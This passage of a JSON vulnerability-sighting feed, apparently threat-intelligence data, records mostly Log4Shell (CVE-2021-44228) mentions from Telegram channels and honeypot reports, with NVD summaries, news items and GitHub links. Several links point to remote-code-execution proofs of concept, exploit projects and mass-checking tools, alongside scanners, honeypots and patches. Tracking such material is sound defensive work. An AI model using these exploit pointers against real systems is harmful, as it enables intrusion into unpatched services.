log4j-cve-2021-44228-hotpatch-1.1-16 will now explicitly mimic the Linux capabilities and cgroups of the target Java process that the hotpatch is applied to.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-04-20T02:24:51.000000Z"}, {"uuid": "888123e7-214d-4c38-bcdb-e735d668cfda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cibsecurity/33979", "content": "\u203c CVE-2021-45046 \u203c\n\nIt was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (&lt;2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-14T22:14:54.000000Z"}, {"uuid": "89ade9a6-7c91-4c90-b61e-ee2e3eab09e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cibsecurity/37851", "content": "\u203c CVE-2022-23848 \u203c\n\nIn Alluxio before 2.7.3, the logserver does not validate the input stream. NOTE: this is not the same as the CVE-2021-44228 Log4j vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-02-20T22:40:38.000000Z"}, {"uuid": "5b02b9bd-52b6-4483-b477-e5c240706907", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "Telegram/DIo32ziY7elpdPZqI6KleBPIwxJWIVhPbqd9oCQhGRzShLg", "content": "", "creation_timestamp": "2026-04-28T15:00:06.000000Z"}, {"uuid": "ccb4c8d5-542f-4473-8020-a0cce5058f2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cibsecurity/33950", "content": "\u274c What the Log4Shell Bug Means for SMBs: Experts Weigh In \u274c\n\nAn exclusive roundtable of security researchers discuss the specific implications of CVE-2021-44228 for smaller businesses, including what's vulnerable, what an attack looks like and to how to remediate.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2021-12-14T19:05:30.000000Z"}, {"uuid": "af82ffa5-fe50-40ae-a4a6-db799184bc3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cibsecurity/33912", "content": "\u203c CVE-2021-4104 \u203c\n\nJMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-14T14:13:20.000000Z"}, {"uuid": "64621e4b-a633-497c-8bc1-09a86a0c7b7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44224", "type": "seen", "source": "https://t.me/cibsecurity/34271", "content": "\u203c CVE-2021-44224 \u203c\n\nA crafted URI sent to httpd configured as a forward proxy (ProxyRequests on) can cause a crash (NULL pointer dereference) or, for configurations mixing forward and reverse proxy declarations, can allow for requests to be directed to a declared Unix Domain Socket endpoint (Server Side Request Forgery). This issue affects Apache HTTP Server 2.4.7 up to 2.4.51 (included).\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-20T14:39:56.000000Z"}, {"uuid": "5e4fbb91-88d2-449c-be58-4be2f62ac52a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44227", "type": "seen", "source": "https://t.me/cibsecurity/33247", "content": "\u203c CVE-2021-44227 \u203c\n\nIn GNU Mailman before 2.1.38, a list member or moderator can get a CSRF token and craft an admin request (using that token) to set a new admin password or make other changes.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-02T07:36:00.000000Z"}, {"uuid": "e68f9243-ff98-4921-a61c-463a1ebf9e85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44225", "type": "seen", "source": "https://t.me/cibsecurity/32987", "content": "\u203c CVE-2021-44225 \u203c\n\nIn Keepalived through 2.2.4, the D-Bus policy does not sufficiently restrict the message destination, allowing any user to inspect and manipulate any property. This leads to access-control bypass in some situations in which an unrelated D-Bus system service has a settable (writable) property\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-26T02:30:22.000000Z"}, {"uuid": "da0ed655-d761-4393-b5ce-670ecc466d4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44223", "type": "seen", "source": "https://t.me/cibsecurity/32986", "content": "\u203c CVE-2021-44223 \u203c\n\nWordPress before 5.8 lacks support for the Update URI plugin header. This makes it easier for remote attackers to execute arbitrary code via a supply-chain attack against WordPress installations that use any plugin for which the slug satisfies the naming constraints of the WordPress.org Plugin Directory but is not yet present in that directory.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-03-20T21:59:20.000000Z"}, {"uuid": "26dd4483-8b9c-429a-b8b3-0aea6cbc0fd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/information_security_channel/47389", "content": "Critical Zero-Day \u201cLog4Shell\u201d Vulnerability \u201cCVE-2021-44228\u201d Exploited in the Wild\nhttps://blogs.quickheal.com/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/", "creation_timestamp": "2022-05-10T13:51:13.000000Z"}, {"uuid": "39b9d908-fd52-4d6a-b2ab-d8ccdadbe6e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-01)", "content": "", "creation_timestamp": "2026-05-01T00:00:00.000000Z"}, {"uuid": "8bfb8849-2bbc-4100-a630-ff16984686ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-02)", "content": "", "creation_timestamp": "2026-05-02T00:00:00.000000Z"}, {"uuid": "8481310f-5170-4d15-8dac-ecd1288e4fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/haccking/103193", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\nCVE-2021-44228. Python Log4RCE", "creation_timestamp": "2021-12-27T14:01:52.000000Z"}, {"uuid": "2c94290e-3f78-453e-8d0f-3aec220a4bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/reverse_dungeon/1201", "content": "log4j-honeypot-flask\n\nInternal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228\n\nhttps://github.com/BinaryDefense/log4j-honeypot-flask\n\n#honeypot #log4j", "creation_timestamp": "2021-12-29T12:33:38.000000Z"}, {"uuid": "49ee467d-5243-46c5-8d73-7df2bdfced0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/DerechodelaRed/3790", "content": "Gu\u00eda detallada sobre la vulnerabilidad Log4J\n\n\u25aa\ufe0f\u00bfQu\u00e9 es LDAP y JNDI?\n\u25aa\ufe0fB\u00fasqueda JNDI de Log4j\n\u25aa\ufe0fEscenario Log4j normal\n\u25aa\ufe0fEscenario de explotaci\u00f3n de Log4j\n\u25aa\ufe0fConfiguraci\u00f3n de Pentest Lab\n\u25aa\ufe0fExplotaci\u00f3n de Log4j (CVE-2021-44228)\n\u25aa\ufe0fMitigaci\u00f3n\n\nhttps://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/\n\n\ud83d\udd0a t.me/derechodelared", "creation_timestamp": "2021-12-20T08:03:49.000000Z"}, {"uuid": "aebf57a5-fdb3-4b7f-a544-7b15f2ac1059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/DerechodelaRed/3797", "content": "\ud83d\udcdd\u27a1\ufe0f CISA lanza un esc\u00e1ner para identificar los servicios web afectados por Log4j\n\nCISA ha anunciado el lanzamiento de un esc\u00e1ner para identificar servicios web afectados por dos vulnerabilidades de ejecuci\u00f3n remota de c\u00f3digo de Apache Log4j, rastreadas como CVE-2021-44228 y CVE-2021-45046.\n\nhttps://derechodelared.com/cisa-escaner-log4j/\n\n\ud83d\udd0a t.me/derechodelared", "creation_timestamp": "2021-12-23T09:42:02.000000Z"}, {"uuid": "fe7af2b4-6257-4435-bb9c-f837ada6641e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/DerechodelaRed/3800", "content": "\ud83d\udcdd\u27a1\ufe0f Mapa en tiempo real de Log4j\n\nEste mapa esta realizado por la empresa CrowdSec y nos muestra en tiempo real los datos sobre intentos de explotaci\u00f3n de la vulnerabilidad Log4Shell (CVE-2021-44228), con una lista de direcciones IP detectadas.\n\nhttps://derechodelared.com/mapa-log4j/\n\n\ud83d\udd0a t.me/derechodelared", "creation_timestamp": "2021-12-24T11:43:28.000000Z"}, {"uuid": "2c6066cf-e65e-4676-9bb6-46c2a2d7fa13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/information_security_channel/47390", "content": "On December 9, 2021, Apache revealed a severe Remote code execution vulnerability CVE-2021-44228 named \u201cLog4Shell\u201d in Apache Java-based...\nThe post Critical Zero-Day \u201cLog4Shell\u201d Vulnerability \u201cCVE-2021-44228\u201d Exploited in the Wild (https://blogs.quickheal.com/critical-zero-day-log4shell-vulnerability-cve-2021-44228-exploited-in-the-wild/) appeared first on Quick Heal Blog | Latest computer security news, tips, and advice (https://blogs.quickheal.com/).", "creation_timestamp": "2022-05-10T13:51:14.000000Z"}, {"uuid": "5c7c8964-f7a9-49cd-ab0e-82fe38a03953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/information_security_channel/46075", "content": "A critical zero-day vulnerability (CVE-2021-44228) recently discovered Apache Log4J, the popular java open source logging library used in...\nThe post CVE-2021-44228: New Apache Log4j \u2018Log4Shell\u2019 Zero-Day Being Exploited in the Wild (https://blogs.quickheal.com/cve-2021-44228-new-apache-log4j-log4shell-zero-day-being-exploited-in-the-wild/) appeared first on Quick Heal Blog | Latest computer security news, tips, and advice (https://blogs.quickheal.com/).", "creation_timestamp": "2021-12-15T12:59:45.000000Z"}, {"uuid": "449912da-2b74-4b74-86e7-d002b5387c71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/thehackernews/1722", "content": "Log4Shell / CVE-2021-44228 / CVSS 10\n\nA new highly critical RCE vulnerability in the Java-based Log4J logging library affects a large number of applications and services on the Internet.\n\nDetails \u2014 https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html", "creation_timestamp": "2024-03-11T10:57:36.000000Z"}, {"uuid": "fd80faf4-9847-47f3-b07e-c4e77b9d136a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/information_security_channel/46074", "content": "CVE-2021-44228: New Apache Log4j \u2018Log4Shell\u2019 Zero-Day Being Exploited in the Wild\nhttps://blogs.quickheal.com/cve-2021-44228-new-apache-log4j-log4shell-zero-day-being-exploited-in-the-wild/", "creation_timestamp": "2021-12-15T12:59:45.000000Z"}, {"uuid": "2ff8743c-d545-4629-966a-1de2c8248991", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/thehackernews/1730", "content": "URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for the recently disclosed Log4Shell exploit (CVE-2021-44228) was deemed incomplete in certain non-default configurations.\n\nDetails: https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html", "creation_timestamp": "2021-12-15T06:36:47.000000Z"}, {"uuid": "43b86891-695d-4769-bd77-6c8805d6fdee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1481", "content": "#CVE-2021\n#Log4Shell \nA Remote Code Execution PoC for Log4Shell (CVE-2021-44228)\n\nhttps://github.com/ubitech/cve-2021-44228-rce-poc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T00:30:09.000000Z"}, {"uuid": "8ceab0a8-c0f5-4e7f-96bb-8579190b4974", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1532", "content": "#CVE-2021\n#Log4Shell \nSimple Spring Boot application vulnerable to CVE-2021-44228 (a.k.a log4shell) \n\nhttps://github.com/guerzon/log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:35:40.000000Z"}, {"uuid": "77ad2528-624a-4fd9-814b-fb9fe132ddfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1482", "content": "#CVE-2021\n#Log4Shell \nData we are receiving from our honeypots about CVE-2021-44228\n\nhttps://github.com/honeynet/log4shell-data\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T00:30:40.000000Z"}, {"uuid": "e0462a31-d169-4c96-b250-04d487135292", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1389", "content": "#CVE-2021\n#Log4j \n\nMass Check Vulnerable Log4j CVE-2021-44228\n\nhttps://github.com/justakazh/Log4j-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T18:01:53.000000Z"}, {"uuid": "3cb8bf55-1186-4487-82c0-63da88ebd684", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1483", "content": "#CVE-2021\n#Log4j \n\nlog4j (CVE-2021-44228) Spring-boot web application with vulnerabilities\n\nhttps://github.com/Auddn/ITF-log4shell-vulnapp\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T06:41:35.000000Z"}, {"uuid": "13539d12-4528-41ee-b8d1-9675f55b337b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1325", "content": "#CVE-2021\n\nDetections for CVE-2021-44228 inside of nested binaries\n\nhttps://github.com/darkarnium/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T18:00:54.000000Z"}, {"uuid": "28a1d0fb-c556-4c5b-94f8-8fa6e49d6b9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1326", "content": "#CVE-2021\n#Log4j\n\nLog4j-RCE (CVE-2021-44228) Proof of Concept with additional information\n\nhttps://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T18:01:34.000000Z"}, {"uuid": "7e14227c-ea72-4e19-94bb-0ac4b8c58dd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1343", "content": "#CVE-2021\n#Log4j\nCVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\nhttps://github.com/RK800-DEV/apache-log4j-exploit\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T11:21:14.000000Z"}, {"uuid": "e36e9bff-29dc-4389-9439-b01a1f25093a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1344", "content": "#CVE-2021\n#Log4j\nDeploys an agent to fix  CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process\n\nhttps://github.com/simonis/Log4jPatch\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T12:06:36.000000Z"}, {"uuid": "e93024c8-b1f6-4299-b19e-65874b295db8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1345", "content": "#CVE-2021\n\nCVE-2021-44228 Minecraft PoC\n\nhttps://github.com/myyxl/cve-2021-44228-minecraft-poc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T12:27:41.000000Z"}, {"uuid": "49169241-77cd-476c-b480-6bb7705865d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44226", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1858", "content": "#Red_Team\n1. Pwning 3CX Phone Management Backends from the Internet\nhttps://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88\n2. Local Privilege Escalation Attack via Razer Synapse Installer (CVE-2021-44226)\nhttps://blog.syss.com/posts/razer-lpe-attack\n\n@BlueRedTeam", "creation_timestamp": "2022-03-31T10:38:06.000000Z"}, {"uuid": "c205628e-7a95-4011-9738-938e29247c29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/xakep_ru/15110", "content": "\u041a\u0430\u0436\u0434\u043e\u0435 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0435\u0435 Log4j, \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e \u043f\u0435\u0440\u0435\u0434 Log4Shell\n\n\u041c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 Apache Log4j, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043f\u0435\u0440\u0435\u0434 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell (CVE-2021-44228), \u0445\u043e\u0442\u044f \u0441 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0448\u043b\u043e \u0443\u0436\u0435 \u0431\u043e\u043b\u044c\u0448\u0435 \u0434\u0432\u0443\u0445 \u043b\u0435\u0442.\n\nhttps://xakep.ru/2023/12/12/log4shell-stats/", "creation_timestamp": "2023-12-12T11:35:43.000000Z"}, {"uuid": "27d8bb25-611e-4e90-a827-c9a8ca2f8737", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/xakep_ru/15125", "content": "Lazarus \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u0434\u0432\u0443\u0445\u043b\u0435\u0442\u043d\u0435\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0442\u0440\u043e\u044f\u043d\u043e\u0432\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u0441\u0435\u0432\u0435\u0440\u043e\u043a\u043e\u0440\u0435\u0439\u0441\u043a\u0430\u044f \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Lazarus \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell (CVE-2021-44228). \u0422\u0435\u043f\u0435\u0440\u044c \u0431\u0430\u0433 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0442\u0440\u0435\u0445 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432 \u043c\u0430\u043b\u0432\u0430\u0440\u0438, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 DLang.\n\nhttps://xakep.ru/2023/12/14/lazarus-log4shell/", "creation_timestamp": "2023-12-14T15:04:56.000000Z"}, {"uuid": "e59bacdb-2192-4b2e-bd94-5c948e8f3e5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1475", "content": "#CVE-2021\n\nCVE-2021-44228 demo webapp\n\nhttps://github.com/MkTech-0-8YT3/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T19:32:49.000000Z"}, {"uuid": "ab421e64-9351-40a2-aa70-31b1a53fe2a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1476", "content": "#CVE-2021\n#log4j \nA scanner and a proof of sample exploit for  log4j RCE CVE-2021-44228 \n\nhttps://github.com/isuruwa/Log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T20:18:38.000000Z"}, {"uuid": "f5980f70-0d5a-488d-8bc3-ba4346ad6cf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1470", "content": "#CVE-2021\n#log4j\ndemo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability\n\nhttps://github.com/kossatzd/log4j-CVE-2021-44228-test\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T15:46:05.000000Z"}, {"uuid": "d96592d5-e052-476a-822b-fbe7f4da514a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1508", "content": "#CVE-2021\n#Log4j\nApplications that are vulnerable to the log4j CVE-2021-44228/45046 issue may be detectable by scanning jar, war, ear, zip files to search for the presence of JndiLookup.class.\n\nhttps://github.com/hozyx/log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T21:03:20.000000Z"}, {"uuid": "2b2ba0a7-6dd1-46a6-a62f-8ab6fe0768f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1509", "content": "#CVE-2021\n#Log4j \nSamples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228.\n\nhttps://github.com/mergebase/log4j-samples\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T22:06:43.000000Z"}, {"uuid": "9ef38282-37cd-46cd-881a-65fd4b49cad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1510", "content": "#CVE-2021\n#Log4Shell \n\nLog4Shell Proof of Concept (CVE-2021-44228)\n\nhttps://github.com/Kr0ff/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T23:29:29.000000Z"}, {"uuid": "79256dfe-007f-49e8-8267-fc323e6063de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1511", "content": 